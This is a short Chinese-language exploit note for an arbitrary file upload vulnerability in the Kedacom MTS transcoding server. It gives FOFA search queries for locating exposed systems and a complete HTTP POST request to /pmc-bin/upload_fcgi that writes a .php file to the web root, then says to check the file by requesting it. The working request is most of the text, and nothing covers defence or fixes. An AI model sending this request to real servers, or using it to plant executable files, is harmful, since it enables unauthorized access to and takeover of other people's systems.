K3-1科达-Kedacom系统-文件上传
漏洞描述:
KEDACOM MTS转码服务器存在任意文件上传漏洞,攻击这通过漏洞可以读取服务器任意信息。
影响版本:
- 科达-Kedacom系统
网站图片:
网络测绘:
fofa语法:
title=“监控管理客户端”
icon_hash=“-908445132”
漏洞复现:
payload:
POST /pmc-bin/upload_fcgi?uploadDir=/&uploadName=aaa.php HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: 164
----WebKitFormBoundary
Content-Disposition: form-data; name="Filedata": filename="aaa"
Content-Type: application/octet-stream
test123
----WebKitFormBoundary--
效果图:
访问根目录的 aaa.php,看到上传的文件